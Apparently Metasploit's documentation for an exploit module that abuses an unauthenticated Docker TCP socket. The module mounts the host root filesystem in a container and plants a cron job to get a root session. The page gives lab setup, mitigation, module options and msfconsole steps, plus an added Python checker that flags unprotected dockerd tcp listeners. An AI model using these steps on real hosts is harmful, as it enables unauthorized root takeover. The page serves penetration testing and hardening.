Path: blob/master/documentation/modules/exploit/linux/http/docker_daemon_tcp.md
Vulnerable Application
Using Docker through an unprotected tcp socket (2375/tcp, or possibly 2376/tcp with tls but without tls-auth), an attacker can create a Docker container with the '/' path of the host server mounted with read/write permissions. Because the container executes commands as uid 0, the host operating system honors them, allowing the attacker to edit or create files owned by root. This exploit abuses this to create a cron job in the '/etc/cron.d/' path of the host server.
The Docker image should exist on the target system or be a valid image from hub.docker.com.
Docker Engine
By default, Docker runs via a non-networked unix socket. It can also optionally communicate using a tcp socket.
Warning: Changing the default docker daemon binding to a TCP port or Unix docker user group will increase your security risks by allowing non-root users to gain root access on the host. Make sure you control access to docker. If you are binding to a TCP port, anyone with access to that port has full Docker access; so it is not advisable on an open network. -- from docs.docker.com
This module was tested with Debian 9 and CentOS 7 as the host operating system and with Docker CE 17.06.0-ce and Docker Engine 1.13.1.
Install Debian 9
First install Debian 9 with default task selection. This includes the "standard system utilities".
Install Docker
Then install a supported version of Docker on the Debian system.
Activate unprotected tcp socket
Once Docker is installed, customize the Docker daemon options and add the tcp socket option -H tcp://0.0.0.0:2375. On Debian, override the settings from /lib/systemd/system/docker.service with a new file /etc/systemd/system/docker.service.
Further information: docker systemd and docker daemon options.
Mitigation
Disable or protect the Docker tcp socket.
User namespaces did not protect against this.
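A configuration check for the mitigation above, as an added example that is not part of the module or its documentation: it reads the ExecStart line of a systemd unit and an optional daemon.json, and reports every tcp listener that lacks client certificate verification. The function names and the sample unit are constructed for illustration; -H/--host, --tls, --tlsverify and the daemon.json keys hosts, tls and tlsverify are dockerd's own options.

```python
import json
import shlex

# Constructed sample: a systemd override like the one described in
# "Activate unprotected tcp socket".
SAMPLE_UNIT = """\
[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
"""

def _flag_on(value):
    return value.lower() not in ("false", "0")

def parse_execstart(unit_text):
    """Return (hosts, tls, tlsverify) from the last ExecStart= line of a unit."""
    cmd = ""
    for line in unit_text.replace("\\\n", " ").splitlines():
        if line.strip().startswith("ExecStart="):
            cmd = line.split("=", 1)[1]  # an empty value resets earlier entries
    hosts, tls, verify = [], False, False
    args = shlex.split(cmd)
    for i, arg in enumerate(args):
        name, _, val = arg.partition("=")
        if name in ("-H", "--host"):
            hosts.append(val or (args[i + 1] if i + 1 < len(args) else ""))
        elif name == "--tls":
            tls = _flag_on(val or "true")
        elif name == "--tlsverify":
            verify = _flag_on(val or "true")
    return hosts, tls, verify

def audit(unit_text, daemon_json="{}"):
    """List (host, problem) for each tcp listener without client-cert auth."""
    hosts, tls, verify = parse_execstart(unit_text)
    cfg = json.loads(daemon_json)
    hosts = hosts + cfg.get("hosts", [])
    tls = tls or bool(cfg.get("tls"))
    verify = verify or bool(cfg.get("tlsverify"))
    findings = []
    for host in hosts:
        if not host.startswith("tcp://") or verify:
            continue  # unix/fd sockets, or tcp protected by --tlsverify
        problem = ("TLS without client certificate verification" if tls
                   else "plaintext, no authentication")
        findings.append((host, problem))
    return findings

if __name__ == "__main__":
    for host, problem in audit(SAMPLE_UNIT):
        print(f"{host}: {problem}")
```
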
Exploitation
This module lets an attacker leverage the creation of a Docker container without authentication, through the Docker tcp socket, to gain root access to the server hosting the Docker container.
Options
DOCKERIMAGE is the image, available locally or from hub.docker.com, that you want Docker to deploy for this exploit.
CONTAINER_ID sets a human-readable name for your container; if it is not set, the name is randomly generated.
Steps to exploit with module
Start msfconsole
use exploit/linux/http/docker_daemon_tcp
Set the options appropriately and set VERBOSE to true
Verify it creates a Docker container and it successfully runs
After a minute a session should be opened from the Docker server